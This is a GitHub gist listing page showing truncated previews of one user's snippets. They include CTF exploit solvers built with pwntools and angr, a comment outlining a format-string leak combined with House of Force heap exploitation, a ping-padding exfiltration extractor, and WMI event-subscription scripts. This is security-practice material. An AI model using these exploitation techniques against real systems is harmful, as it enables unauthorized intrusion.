Skip to content

Instantly share code, notes, and snippets.

from scapy.all import *
import sys
import base64
# script to extract data from ping padding (http://wumb0.in/ping-exfil.html)
try:
config.conf.iface = sys.argv[2]
except: pass
@wumb0
wumb0 / col_solve.py
Last active March 16, 2017 21:06
angr solver for the collision challenge of pwnable.kr
from angr import Project, surveyors
from sys import exit
import claripy
'''vars
pstr: where the dynamic input will be stored in the state
phcode: the address of hash to collide with (the program loads the correct hash from this address)
find: the address we want the path explorer to find (the "you win" address)
retn: the simulation starts in a function called from main (check_password) but the 'find' address is in main so I need a place to return
@wumb0
wumb0 / boinary.py
Created September 4, 2016 22:49
dat-boinary solver
from pwn import *
from time import sleep
e = ELF('./dat-boinary')
libc = ELF(args.get('LIBC', './libc.so.6'))
if args.get('REMOTE'):
r = remote("problems.ctfx.io", 1337)
else:
r = process(e.path)
@wumb0
wumb0 / greeting.py
Last active September 6, 2016 01:06
pwn greeting from mmactf 2016
from pwn import *
from libformatstr import FormatStr
context.log_level = 'info'
e = ELF("./greeting")
if args.get('REMOTE'):
r = remote('pwn2.chal.ctf.westerns.tokyo', 16317, timeout=10)
else:
from pwn import *
from time import sleep
import numpy as np
'''
this is a format string leak combined with house of force heap exploitation.
You control the amount of memory allocated. So allocating very little space,
then a lot (calculated), then again will allow you to get a pointer to read/write
anywhere you want!
Steps:
BITS 32
; flag: RC3-2016-YEAH-DATS-BETTER-BOII
; based on http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html
org 0x08048000
ehdr:
db "FLAG" ; e_ident
db 1, 1, 1, 0, 0
_start: mov ecx,promptsize
jmp main
dw 2 ; e_type
@wumb0
wumb0 / asmconsole.py
Last active May 16, 2020 00:06
assembler in a loop
'''asm console via keystone for python 2.7
pip install keystone-engine
python asmconsole.py -a ARM -m LITTLE_ENDIAN -f escape -b 0x000086e4
Little endian arm print escape codes and make base address 0x000086e4
'''
from __future__ import print_function
import keystone
import argparse
from sys import exit
# Copyright (c) Microsoft Corporation. All rights reserved.
# For personal use only. Provided AS IS and WITH ALL FAULTS.
# Set-WmiNamespaceSecurity.ps1
# Example: Set-WmiNamespaceSecurity root/cimv2 add steve Enable,RemoteAccess
# https://blogs.msdn.microsoft.com/wmi/2009/07/27/scripting-wmi-namespace-security-part-3-of-3/
function Set-WmiNamespaceSecurity {
Param (
@wumb0
wumb0 / MonitorMalware.ps1
Last active May 16, 2020 00:05
WMI consumer and filter that trigger on a windows defender malware alert with details
$argss = @{Name="MonitorMalwareFilt";QueryLanguage="WQL";Query="select * from __instancecreationevent within 5 where targetinstance isa 'Malware'";EventNamespace="root\Microsoft\SecurityClient"}
$filt = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $argss
$argss = @{Name="MonitorMalwareCons";CommandLineTemplate="msg * Malware: %TargetInstance.ThreatName% from %TargetInstance.User% at %TargetInstance.Path% (Severity: %TargetInstance.SeverityID%)"}
$cons = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $argss
$argss = @{Filter=$filt;Consumer=$cons}
Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $argss
@wumb0
wumb0 / indexer.py
Last active February 27, 2018 05:51
helps index stuff for exams... if they don't give you an index, or the one they provide is bad. tweak as you see fit.
from sqlalchemy import create_engine, Column, Integer, String, func
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from reportlab.lib.pagesizes import letter
from reportlab.lib.units import cm
from reportlab.pdfgen import canvas
from reportlab.pdfbase.pdfmetrics import stringWidth
import sys
try: